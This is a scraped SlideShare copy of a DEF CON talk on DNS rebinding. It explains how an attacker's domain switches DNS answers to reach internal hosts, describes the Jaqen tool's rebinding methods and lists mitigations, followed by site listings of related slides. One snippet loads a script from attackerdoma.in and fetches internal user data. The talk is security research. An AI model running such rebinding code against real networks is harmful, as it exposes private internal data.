SlideShare une entreprise Scribd logo
1  sur  57
Télécharger pour lire hors ligne
There’s no place like 127.0.0.1
Achieving “reliable” DNS rebinding in modern browsers
$ whoami
Luke Young - Sr. Information Security Engineer at LinkedIn
Email: lyoung@linkedin.com or luke@bored.engineer
LinkedIn: www.linkedin.com/in/bored-engineer
3rd year at DEF CON
Attacking Network Infrastructure to Generate a 4 Tb/s DDoS for $5
Investigating the Practicality and Cost of Abusing Memory Errors
Agenda
Establishing Acme Corporation
Understanding DNS Rebinding
Automating DNS Rebinding
Practical Exploits
Demo!
Acme Corp - Network Architecture
!"
#
Internet
Chris
$
corp.acme.com
attackerdoma.in
%
Attacker
Corporate Network
Code Repository
code.corp.acme.com Developer
Acme Corp - Network Architecture
!"
#
Internet
Chris
$
corp.acme.com
attackerdoma.in
%
Attacker
Corporate Network
Code Repository
code.corp.acme.com Developer
Acme Corp - Network Architecture
!"
#
Internet
Chris
$
corp.acme.com
attackerdoma.in
%
Attacker
Corporate Network
Code Repository
code.corp.acme.com Developer
Acme Corp - Network Architecture
!"
#
Internet
Chris
$
corp.acme.com
attackerdoma.in
%
Attacker
Corporate Network
Code Repository
code.corp.acme.com Developer
Acme Corp - Network Architecture
!"
#
Internet
Chris
$
corp.acme.com
attackerdoma.in
%
Attacker
Corporate Network
Code Repository
code.corp.acme.com Developer
Acme Corp - Network Architecture
!"
#
Internet
Chris
$
corp.acme.com
attackerdoma.in
%
Attacker
Corporate Network
Code Repository
code.corp.acme.com Developer
attackerdoma.in code.corp.acme.com
#include <iostream>
int main()
{
std::cout << "Hello, world!n";
}
HelloWorld.cpp:
Secrets.txt:
Billion $ Business Plan:
Same-origin policy refresher
evil.js GET /CompanySecrets.txt
attackerdoma.in code.corp.acme.com
#include <iostream>
int main()
{
std::cout << "Hello, world!n";
}
HelloWorld.cpp:
Secrets.txt:
Billion $ Business Plan:
Same-origin policy refresher
evil.js
SOP
GET /CompanySecrets.txt
attackerdoma.in code.corp.acme.com
#include <iostream>
HelloWorld.cpp:
Same-origin policy refresher
evil.js
SOP
attackerdoma.in
cors.example.com
GET /CompanySecrets.txt
GET /SomeFile.txt
subdomain.attackerdoma.inGET /SomeFile.txt
GET /SomeFile.txt
browser
! Chris
dns.corp
10.0.0.1
attackerdoma.in
137.137.137.137
code.corp
10.0.0.99
browser
! Chris
dns.corp
10.0.0.1
attackerdoma.in
137.137.137.137
code.corp
10.0.0.99
DNS Question (A)
rebind.attackerdoma.in
DNS Question (A)
rebind.attackerdoma.in
browser
! Chris
dns.corp
10.0.0.1
attackerdoma.in
137.137.137.137
code.corp
10.0.0.99
DNS Question (A)
rebind.attackerdoma.in
DNS Question (A)
rebind.attackerdoma.in
DNS Question (A)
rebind.attackerdoma.in
DNS Answer (A)
TTL 2 - 137.137.137.137
browser
! Chris
dns.corp
10.0.0.1
attackerdoma.in
137.137.137.137
code.corp
10.0.0.99
DNS Question (A)
rebind.attackerdoma.in
DNS Question (A)
rebind.attackerdoma.in
DNS Question (A)
rebind.attackerdoma.in
DNS Answer (A)
TTL 2 - 137.137.137.137
DNS Answer (A)
TTL 2 - 137.137.137.137
DNS Answer (A)
TTL 2 - 137.137.137.137
browser
! Chris
dns.corp
10.0.0.1
attackerdoma.in
137.137.137.137
code.corp
10.0.0.99
DNS Question (A)
rebind.attackerdoma.in
DNS Question (A)
rebind.attackerdoma.in
DNS Question (A)
rebind.attackerdoma.in
DNS Answer (A)
TTL 2 - 137.137.137.137
DNS Answer (A)
TTL 2 - 137.137.137.137
DNS Answer (A)
TTL 2 - 137.137.137.137
HTTP GET /
Host: rebind.attackerdoma.in
browser
! Chris
dns.corp
10.0.0.1
attackerdoma.in
137.137.137.137
code.corp
10.0.0.99
DNS Question (A)
rebind.attackerdoma.in
DNS Question (A)
rebind.attackerdoma.in
DNS Question (A)
rebind.attackerdoma.in
DNS Answer (A)
TTL 2 - 137.137.137.137
DNS Answer (A)
TTL 2 - 137.137.137.137
DNS Answer (A)
TTL 2 - 137.137.137.137
HTTP GET /
Host: rebind.attackerdoma.in
HTTP GET /
Host: rebind.attackerdoma.in
browser
! Chris
dns.corp
10.0.0.1
attackerdoma.in
137.137.137.137
code.corp
10.0.0.99
DNS Question (A)
rebind.attackerdoma.in
DNS Question (A)
rebind.attackerdoma.in
DNS Question (A)
rebind.attackerdoma.in
DNS Answer (A)
TTL 2 - 137.137.137.137
DNS Answer (A)
TTL 2 - 137.137.137.137
DNS Answer (A)
TTL 2 - 137.137.137.137
HTTP GET /
Host: rebind.attackerdoma.in
HTTP GET /
Host: rebind.attackerdoma.in
200 OK
<script>let DNSRebind…
200 OK
<script>let DNSRebind…
browser
! Chris
dns.corp
10.0.0.1
attackerdoma.in
137.137.137.137
code.corp
10.0.0.99
DNS Q (A) rebind.attackerdoma.in DNS Q (A) rebind.attackerdoma.in DNS Q (A) rebind.attackerdoma.in
DNS A (A) 137.137.137.137.137 - 2 secsDNS A (A) 137.137.137.137.137 - 2 secsDNS A (A) 137.137.137.137.137 - 2 secs
HTTP GET / rebind.attackerdoma.in HTTP GET / rebind.attackerdoma.in
200 OK <script> let DNSRebind…200 OK <script> let DNSRebind…
browser
! Chris
dns.corp
10.0.0.1
attackerdoma.in
137.137.137.137
code.corp
10.0.0.99
DNS Q (A) rebind.attackerdoma.in DNS Q (A) rebind.attackerdoma.in DNS Q (A) rebind.attackerdoma.in
DNS A (A) 137.137.137.137.137 - 2 secsDNS A (A) 137.137.137.137.137 - 2 secsDNS A (A) 137.137.137.137.137 - 2 secs
HTTP GET / rebind.attackerdoma.in HTTP GET / rebind.attackerdoma.in
200 OK <script> let DNSRebind…200 OK <script> let DNSRebind…
DNS Question (A)
rebind.attackerdoma.in
browser
! Chris
dns.corp
10.0.0.1
attackerdoma.in
137.137.137.137
code.corp
10.0.0.99
DNS Q (A) rebind.attackerdoma.in DNS Q (A) rebind.attackerdoma.in DNS Q (A) rebind.attackerdoma.in
DNS A (A) 137.137.137.137.137 - 2 secsDNS A (A) 137.137.137.137.137 - 2 secsDNS A (A) 137.137.137.137.137 - 2 secs
HTTP GET / rebind.attackerdoma.in HTTP GET / rebind.attackerdoma.in
200 OK <script> let DNSRebind…200 OK <script> let DNSRebind…
DNS Question (A)
rebind.attackerdoma.in
DNS Question (A)
rebind.attackerdoma.in
browser
! Chris
dns.corp
10.0.0.1
attackerdoma.in
137.137.137.137
code.corp
10.0.0.99
DNS Q (A) rebind.attackerdoma.in DNS Q (A) rebind.attackerdoma.in DNS Q (A) rebind.attackerdoma.in
DNS A (A) 137.137.137.137.137 - 2 secsDNS A (A) 137.137.137.137.137 - 2 secsDNS A (A) 137.137.137.137.137 - 2 secs
HTTP GET / rebind.attackerdoma.in HTTP GET / rebind.attackerdoma.in
200 OK <script> let DNSRebind…200 OK <script> let DNSRebind…
DNS Question (A)
rebind.attackerdoma.in
DNS Question (A)
rebind.attackerdoma.in
DNS Question (A)
rebind.attackerdoma.in
DNS Answer (A)
TTL 60 - 10.0.0.99
browser
! Chris
dns.corp
10.0.0.1
attackerdoma.in
137.137.137.137
code.corp
10.0.0.99
DNS Q (A) rebind.attackerdoma.in DNS Q (A) rebind.attackerdoma.in DNS Q (A) rebind.attackerdoma.in
DNS A (A) 137.137.137.137.137 - 2 secsDNS A (A) 137.137.137.137.137 - 2 secsDNS A (A) 137.137.137.137.137 - 2 secs
HTTP GET / rebind.attackerdoma.in HTTP GET / rebind.attackerdoma.in
200 OK <script> let DNSRebind…200 OK <script> let DNSRebind…
DNS Question (A)
rebind.attackerdoma.in
DNS Question (A)
rebind.attackerdoma.in
DNS Question (A)
rebind.attackerdoma.in
DNS Answer (A)
TTL 60 - 10.0.0.99
DNS Answer (A)
TTL 60 - 10.0.0.99
DNS Answer (A)
TTL 60 - 10.0.0.99
browser
! Chris
dns.corp
10.0.0.1
attackerdoma.in
137.137.137.137
code.corp
10.0.0.99
DNS Q (A) rebind.attackerdoma.in DNS Q (A) rebind.attackerdoma.in DNS Q (A) rebind.attackerdoma.in
DNS A (A) 137.137.137.137.137 - 2 secsDNS A (A) 137.137.137.137.137 - 2 secsDNS A (A) 137.137.137.137.137 - 2 secs
HTTP GET / rebind.attackerdoma.in HTTP GET / rebind.attackerdoma.in
200 OK <script> let DNSRebind…200 OK <script> let DNSRebind…
DNS Question (A)
rebind.attackerdoma.in
DNS Question (A)
rebind.attackerdoma.in
DNS Question (A)
rebind.attackerdoma.in
DNS Answer (A)
TTL 60 - 10.0.0.99
DNS Answer (A)
TTL 60 - 10.0.0.99
DNS Answer (A)
TTL 60 - 10.0.0.99
HTTP GET /Secrets.txt
Host: rebind.attackerdoma.in
HTTP GET /Secrets.txt
Host: rebind.attackerdoma.in
browser
! Chris
dns.corp
10.0.0.1
attackerdoma.in
137.137.137.137
code.corp
10.0.0.99
DNS Q (A) rebind.attackerdoma.in DNS Q (A) rebind.attackerdoma.in DNS Q (A) rebind.attackerdoma.in
DNS A (A) 137.137.137.137.137 - 2 secsDNS A (A) 137.137.137.137.137 - 2 secsDNS A (A) 137.137.137.137.137 - 2 secs
HTTP GET / rebind.attackerdoma.in HTTP GET / rebind.attackerdoma.in
200 OK <script> let DNSRebind…200 OK <script> let DNSRebind…
DNS Question (A)
rebind.attackerdoma.in
DNS Question (A)
rebind.attackerdoma.in
DNS Question (A)
rebind.attackerdoma.in
DNS Answer (A)
TTL 60 - 10.0.0.99
DNS Answer (A)
TTL 60 - 10.0.0.99
DNS Answer (A)
TTL 60 - 10.0.0.99
HTTP GET /Secrets.txt
Host: rebind.attackerdoma.in
HTTP GET /Secrets.txt
Host: rebind.attackerdoma.in
200 OK
Billion $ Business Plan
browser
! Chris
dns.corp
10.0.0.1
attackerdoma.in
137.137.137.137
code.corp
10.0.0.99
DNS Q (A) rebind.attackerdoma.in DNS Q (A) rebind.attackerdoma.in DNS Q (A) rebind.attackerdoma.in
DNS A (A) 137.137.137.137.137 - 2 secsDNS A (A) 137.137.137.137.137 - 2 secsDNS A (A) 137.137.137.137.137 - 2 secs
HTTP GET / rebind.attackerdoma.in HTTP GET / rebind.attackerdoma.in
200 OK <script> let DNSRebind…200 OK <script> let DNSRebind…
DNS Question (A)
rebind.attackerdoma.in
DNS Question (A)
rebind.attackerdoma.in
DNS Question (A)
rebind.attackerdoma.in
DNS Answer (A)
TTL 60 - 10.0.0.99
DNS Answer (A)
TTL 60 - 10.0.0.99
DNS Answer (A)
TTL 60 - 10.0.0.99
HTTP GET /Secrets.txt
Host: rebind.attackerdoma.in
HTTP GET /Secrets.txt
Host: rebind.attackerdoma.in
200 OK
Billion $ Business Plan
200 OK
Billion $ Business Plan
Acme Corp - Network Architecture
!"
#
Internet
Chris
$
corp.acme.com
attackerdoma.in
%
Attacker
Corporate Network
Code Repository
code.corp.acme.com Developer
Acme Corp - Network Architecture
!"
#
Internet
Chris
$
corp.acme.com
attackerdoma.in
%
Attacker
Corporate Network
Code Repository
code.corp.acme.com Developer
DNS Rebinding Gotcha’s
Chris has to visit the malicious webpage
We required internal knowledge of the Acme network
We had to know the internal IP of code.corp.acme.com beforehand
Notoriously unreliable
Visiting the malicious webpage
Drive-by malicious ads
Phishing
etc
Internal knowledge of the target network
Know code.corp.acme.com exists
Know it lacked authentication
Know that “secrets.txt” is located there
Internal IP of code.corp.acme.com
CNAME code.corp.acme.com
Let the internal DNS resolver do the work for us
DNS Rebinding Unreliability
DNS Rebinding Unreliability
Browser DNS Caches
OS DNS Caches
Nameserver DNS Caches
Browser Protections
Additional Network Protections
General Hacky-ness
Browser DNS caches
OS DNS caches
Nameserver DNS caches
Browser Protections
DNS Record Pinning
Blacklist ports
Some failed attempts at detection
Network Protections
General Hacky-ness
We’ll come back to this…
Why isn’t this fixed yet?
It’s not the browser’s fault, and it’s not easy to fix.
“I'd also recommend that Firefox not fix this issue.  It's not feasible for the
browser to protect the user from DNS rebinding attacks.  Servers need to
protect themselves by validating the Host header and firewalls need to
protect themselves by preventing external names from resolving to internal
IP addresses.” - Commenter on Mozilla Firefox Bug 689835
HTTP 0.9
General Hacky-ness
I promised that we’ll come back to this…
Reliable DNS Rebinding - Jaqen
On the fly IP/port allocation
Dynamic payloads
“Intelligent” method selection
IPv6 and IPv4 support
TTLRebind
Relies on TTL expiration
First request triggers change
Exponential back-off TTLs (1, 2, 4, 8, 16, etc)
TTLRebind
;; QUESTION SECTION:
;00000000-0000-0000-0000-000000000000.jaqen.local. IN A
;; ANSWER SECTION:
00000000-0000-0000-0000-000000000000.jaqen.local. 2 IN A 203.0.113.1
;; QUESTION SECTION:
;00000000-0000-0000-0000-000000000000.jaqen.local. IN A
;; ANSWER SECTION:
00000000-0000-0000-0000-000000000000.jaqen.local. 2 IN A 192.168.1.1
ThresholdRebind
Relies on second DNS request
First request above threshold triggers change
ThresholdRebind
;; QUESTION SECTION:
;00000000-0000-0000-0000-000000000000.jaqen.local. IN A
;; ANSWER SECTION:
00000000-0000-0000-0000-000000000000.jaqen.local. 2 IN A 203.0.113.1
;; QUESTION SECTION:
;00000000-0000-0000-0000-000000000000.jaqen.local. IN A
;; ANSWER SECTION:
00000000-0000-0000-0000-000000000000.jaqen.local. 2 IN A 192.168.1.1
MultiRecordRebind
No actual DNS rebind
Requires a pool of IPs to allocate
Nearly instant
Most expensive method to host
MultiRecordRebind
;; QUESTION SECTION:
;00000000-0000-0000-0000-000000000000.jaqen.local. IN A
;; ANSWER SECTION:
00000000-0000-0000-0000-000000000000.jaqen.local. 2 IN A 203.0.113.1
00000000-0000-0000-0000-000000000000.jaqen.local. 2 IN A 192.168.1.1
Usage
<script src=“http://rebind.attackerdoma.in/js”></script>
<script>
let r = new DNSRebind();
const target = "http://internal.corp.acme.com/users";
r.fetch(target).then((resp) => resp.json()).then((users) => {
alert("Extracted the following users:n" + users.join("n"));
}, (e) => console.error(e));
</script>
Demo?
Suggested mitigations
Add strong authentication
Protect at network border
Add TLS
Verify Host header
Future of jaqen
Bug fixes. Lots of bug fixes.
Dockerize?
Automated browser testing
$ exit
Luke Young - (lyoung@linkedin.com)
Personal Blog (with slides): bored.engineer
LinkedIn Blog Post: security.linkedin.com/blog
GitHub: github.com/linkedin/jaqen

Contenu connexe

Tendances

Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...
Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...
Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...OW2
 
The DNSSEC KSK of the root rolls
The DNSSEC KSK of the root rollsThe DNSSEC KSK of the root rolls
The DNSSEC KSK of the root rollsMen and Mice
 
Part 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOS
Part 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOSPart 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOS
Part 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOSMen and Mice
 
BIND 9 logging best practices
BIND 9 logging best practicesBIND 9 logging best practices
BIND 9 logging best practicesMen and Mice
 
Redis sentinelinternals deview
Redis sentinelinternals deviewRedis sentinelinternals deview
Redis sentinelinternals deviewDaeMyung Kang
 
The CAA-Record for increased encryption security
The CAA-Record for increased encryption securityThe CAA-Record for increased encryption security
The CAA-Record for increased encryption securityMen and Mice
 
55 best linux tips, tricks and command lines
55 best linux tips, tricks and command lines55 best linux tips, tricks and command lines
55 best linux tips, tricks and command linesArif Wahyudi
 
Passive DNS Collection -- the 'dnstap' approach, by Paul Vixie [APNIC 38 / AP...
Passive DNS Collection -- the 'dnstap' approach, by Paul Vixie [APNIC 38 / AP...Passive DNS Collection -- the 'dnstap' approach, by Paul Vixie [APNIC 38 / AP...
Passive DNS Collection -- the 'dnstap' approach, by Paul Vixie [APNIC 38 / AP...APNIC
 
Nagios Conference 2013 - Spenser Reinhardt - Securing Your Nagios Server
Nagios Conference 2013 - Spenser Reinhardt - Securing Your Nagios ServerNagios Conference 2013 - Spenser Reinhardt - Securing Your Nagios Server
Nagios Conference 2013 - Spenser Reinhardt - Securing Your Nagios ServerNagios
 
232 md5-considered-harmful-slides
232 md5-considered-harmful-slides232 md5-considered-harmful-slides
232 md5-considered-harmful-slidesDan Kaminsky
 
X64服务器 lnmp服务器部署标准 new
X64服务器 lnmp服务器部署标准 newX64服务器 lnmp服务器部署标准 new
X64服务器 lnmp服务器部署标准 newYiwei Ma
 
Deeper dive in Docker Overlay Networks
Deeper dive in Docker Overlay NetworksDeeper dive in Docker Overlay Networks
Deeper dive in Docker Overlay NetworksLaurent Bernaille
 
Dynomite at Erlang Factory
Dynomite at Erlang FactoryDynomite at Erlang Factory
Dynomite at Erlang Factorymoonpolysoft
 
DEFCON 23 - Mike Sconzo - i am packer and so can you
DEFCON 23 - Mike Sconzo - i am packer and so can youDEFCON 23 - Mike Sconzo - i am packer and so can you
DEFCON 23 - Mike Sconzo - i am packer and so can youFelipe Prado
 
dns-sec-4-slides
dns-sec-4-slidesdns-sec-4-slides
dns-sec-4-slideskj teoh
 
Varnish Cache and Django (Falcon, Flask etc)
Varnish Cache and Django (Falcon, Flask etc)Varnish Cache and Django (Falcon, Flask etc)
Varnish Cache and Django (Falcon, Flask etc)Данил Иванов
 
Пример отчета по анализу вредоносного кода Zeus, подготовленного Cisco AMP Th...
Пример отчета по анализу вредоносного кода Zeus, подготовленного Cisco AMP Th...Пример отчета по анализу вредоносного кода Zeus, подготовленного Cisco AMP Th...
Пример отчета по анализу вредоносного кода Zeus, подготовленного Cisco AMP Th...Cisco Russia
 
What is new in BIND 9.11?
What is new in BIND 9.11?What is new in BIND 9.11?
What is new in BIND 9.11?Men and Mice
 
Phd tutorial hawq_v0.1
Phd tutorial hawq_v0.1Phd tutorial hawq_v0.1
Phd tutorial hawq_v0.1seungdon Choi
 

Tendances (20)

Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...
Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...
Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...
 
Storage managment using nagios
Storage managment using nagiosStorage managment using nagios
Storage managment using nagios
 
The DNSSEC KSK of the root rolls
The DNSSEC KSK of the root rollsThe DNSSEC KSK of the root rolls
The DNSSEC KSK of the root rolls
 
Part 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOS
Part 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOSPart 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOS
Part 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOS
 
BIND 9 logging best practices
BIND 9 logging best practicesBIND 9 logging best practices
BIND 9 logging best practices
 
Redis sentinelinternals deview
Redis sentinelinternals deviewRedis sentinelinternals deview
Redis sentinelinternals deview
 
The CAA-Record for increased encryption security
The CAA-Record for increased encryption securityThe CAA-Record for increased encryption security
The CAA-Record for increased encryption security
 
55 best linux tips, tricks and command lines
55 best linux tips, tricks and command lines55 best linux tips, tricks and command lines
55 best linux tips, tricks and command lines
 
Passive DNS Collection -- the 'dnstap' approach, by Paul Vixie [APNIC 38 / AP...
Passive DNS Collection -- the 'dnstap' approach, by Paul Vixie [APNIC 38 / AP...Passive DNS Collection -- the 'dnstap' approach, by Paul Vixie [APNIC 38 / AP...
Passive DNS Collection -- the 'dnstap' approach, by Paul Vixie [APNIC 38 / AP...
 
Nagios Conference 2013 - Spenser Reinhardt - Securing Your Nagios Server
Nagios Conference 2013 - Spenser Reinhardt - Securing Your Nagios ServerNagios Conference 2013 - Spenser Reinhardt - Securing Your Nagios Server
Nagios Conference 2013 - Spenser Reinhardt - Securing Your Nagios Server
 
232 md5-considered-harmful-slides
232 md5-considered-harmful-slides232 md5-considered-harmful-slides
232 md5-considered-harmful-slides
 
X64服务器 lnmp服务器部署标准 new
X64服务器 lnmp服务器部署标准 newX64服务器 lnmp服务器部署标准 new
X64服务器 lnmp服务器部署标准 new
 
Deeper dive in Docker Overlay Networks
Deeper dive in Docker Overlay NetworksDeeper dive in Docker Overlay Networks
Deeper dive in Docker Overlay Networks
 
Dynomite at Erlang Factory
Dynomite at Erlang FactoryDynomite at Erlang Factory
Dynomite at Erlang Factory
 
DEFCON 23 - Mike Sconzo - i am packer and so can you
DEFCON 23 - Mike Sconzo - i am packer and so can youDEFCON 23 - Mike Sconzo - i am packer and so can you
DEFCON 23 - Mike Sconzo - i am packer and so can you
 
dns-sec-4-slides
dns-sec-4-slidesdns-sec-4-slides
dns-sec-4-slides
 
Varnish Cache and Django (Falcon, Flask etc)
Varnish Cache and Django (Falcon, Flask etc)Varnish Cache and Django (Falcon, Flask etc)
Varnish Cache and Django (Falcon, Flask etc)
 
Пример отчета по анализу вредоносного кода Zeus, подготовленного Cisco AMP Th...
Пример отчета по анализу вредоносного кода Zeus, подготовленного Cisco AMP Th...Пример отчета по анализу вредоносного кода Zeus, подготовленного Cisco AMP Th...
Пример отчета по анализу вредоносного кода Zeus, подготовленного Cisco AMP Th...
 
What is new in BIND 9.11?
What is new in BIND 9.11?What is new in BIND 9.11?
What is new in BIND 9.11?
 
Phd tutorial hawq_v0.1
Phd tutorial hawq_v0.1Phd tutorial hawq_v0.1
Phd tutorial hawq_v0.1
 

Similaire à There's no place like 127.0.0.1 - Achieving "reliable" DNS rebinding in modern browsers

DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...
DEF CON 27 - GERALD DOUSSOT  AND ROGER MEYER - state of dns rebinding attack ...DEF CON 27 - GERALD DOUSSOT  AND ROGER MEYER - state of dns rebinding attack ...
DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...Felipe Prado
 
DNSSEC Tutorial, by Champika Wijayatunga [APNIC 38]
DNSSEC Tutorial, by Champika Wijayatunga [APNIC 38]DNSSEC Tutorial, by Champika Wijayatunga [APNIC 38]
DNSSEC Tutorial, by Champika Wijayatunga [APNIC 38]APNIC
 
Mens jan piet_dnssec-in-practice
Mens jan piet_dnssec-in-practiceMens jan piet_dnssec-in-practice
Mens jan piet_dnssec-in-practicekuchinskaya
 
DNS_Tutorial 2.pptx
DNS_Tutorial 2.pptxDNS_Tutorial 2.pptx
DNS_Tutorial 2.pptxviditsir
 
DNS Survival Guide
DNS Survival GuideDNS Survival Guide
DNS Survival GuideAPNIC
 
DNS Survival Guide.
DNS Survival Guide.DNS Survival Guide.
DNS Survival Guide.Qrator Labs
 
linux networking commands short
linux networking commands shortlinux networking commands short
linux networking commands shortSayed Ahmed
 
Linux networking commands short
Linux networking commands shortLinux networking commands short
Linux networking commands shortSayed Ahmed
 
Configure Proxy and Firewall (Iptables)
Configure Proxy and Firewall (Iptables)Configure Proxy and Firewall (Iptables)
Configure Proxy and Firewall (Iptables)Tola LENG
 
DNS for Developers - ConFoo Montreal
DNS for Developers - ConFoo MontrealDNS for Developers - ConFoo Montreal
DNS for Developers - ConFoo MontrealMaarten Balliauw
 
DNS DDoS Attack and Risk
DNS DDoS Attack and RiskDNS DDoS Attack and Risk
DNS DDoS Attack and RiskSukbum Hong
 
Dns protocol design attacks and security
Dns protocol design attacks and securityDns protocol design attacks and security
Dns protocol design attacks and securityMichael Earls
 
MongoDB on AWS in 5 min
MongoDB on AWS in 5 minMongoDB on AWS in 5 min
MongoDB on AWS in 5 minDavid Turner
 
DNSSEC - Domain Name System Security Extensions
DNSSEC - Domain Name System Security ExtensionsDNSSEC - Domain Name System Security Extensions
DNSSEC - Domain Name System Security ExtensionsPeter R. Egli
 
Network Intelligence for a secured Network (2014-03-12)
Network Intelligence for a secured Network (2014-03-12)Network Intelligence for a secured Network (2014-03-12)
Network Intelligence for a secured Network (2014-03-12)Andreas Taudte
 
Understanding Azure Networking Services
Understanding Azure Networking ServicesUnderstanding Azure Networking Services
Understanding Azure Networking ServicesInCycleSoftware
 
Windows 2012 and DNSSEC
Windows 2012 and DNSSECWindows 2012 and DNSSEC
Windows 2012 and DNSSECMen and Mice
 

Similaire à There's no place like 127.0.0.1 - Achieving "reliable" DNS rebinding in modern browsers (20)

DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...
DEF CON 27 - GERALD DOUSSOT  AND ROGER MEYER - state of dns rebinding attack ...DEF CON 27 - GERALD DOUSSOT  AND ROGER MEYER - state of dns rebinding attack ...
DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...
 
DNSSEC Tutorial, by Champika Wijayatunga [APNIC 38]
DNSSEC Tutorial, by Champika Wijayatunga [APNIC 38]DNSSEC Tutorial, by Champika Wijayatunga [APNIC 38]
DNSSEC Tutorial, by Champika Wijayatunga [APNIC 38]
 
Mens jan piet_dnssec-in-practice
Mens jan piet_dnssec-in-practiceMens jan piet_dnssec-in-practice
Mens jan piet_dnssec-in-practice
 
DNS_Tutorial 2.pptx
DNS_Tutorial 2.pptxDNS_Tutorial 2.pptx
DNS_Tutorial 2.pptx
 
DNS Survival Guide
DNS Survival GuideDNS Survival Guide
DNS Survival Guide
 
DNS Survival Guide.
DNS Survival Guide.DNS Survival Guide.
DNS Survival Guide.
 
linux networking commands short
linux networking commands shortlinux networking commands short
linux networking commands short
 
Linux networking commands short
Linux networking commands shortLinux networking commands short
Linux networking commands short
 
Configure Proxy and Firewall (Iptables)
Configure Proxy and Firewall (Iptables)Configure Proxy and Firewall (Iptables)
Configure Proxy and Firewall (Iptables)
 
DNS for Developers - ConFoo Montreal
DNS for Developers - ConFoo MontrealDNS for Developers - ConFoo Montreal
DNS for Developers - ConFoo Montreal
 
DNS DDoS Attack and Risk
DNS DDoS Attack and RiskDNS DDoS Attack and Risk
DNS DDoS Attack and Risk
 
Dns protocol design attacks and security
Dns protocol design attacks and securityDns protocol design attacks and security
Dns protocol design attacks and security
 
Hands-on DNSSEC Deployment
Hands-on DNSSEC DeploymentHands-on DNSSEC Deployment
Hands-on DNSSEC Deployment
 
MongoDB on AWS in 5 min
MongoDB on AWS in 5 minMongoDB on AWS in 5 min
MongoDB on AWS in 5 min
 
Ad fundamentals
Ad fundamentalsAd fundamentals
Ad fundamentals
 
DNSSEC - Domain Name System Security Extensions
DNSSEC - Domain Name System Security ExtensionsDNSSEC - Domain Name System Security Extensions
DNSSEC - Domain Name System Security Extensions
 
Network Intelligence for a secured Network (2014-03-12)
Network Intelligence for a secured Network (2014-03-12)Network Intelligence for a secured Network (2014-03-12)
Network Intelligence for a secured Network (2014-03-12)
 
Understanding Azure Networking Services
Understanding Azure Networking ServicesUnderstanding Azure Networking Services
Understanding Azure Networking Services
 
Windows 2012 and DNSSEC
Windows 2012 and DNSSECWindows 2012 and DNSSEC
Windows 2012 and DNSSEC
 
Dns explained
Dns explainedDns explained
Dns explained
 

Dernier

Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Zilliz
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusZilliz
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...apidays
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfOrbitshub
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxRustici Software
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Jeffrey Haguewood
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MIND CTI
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
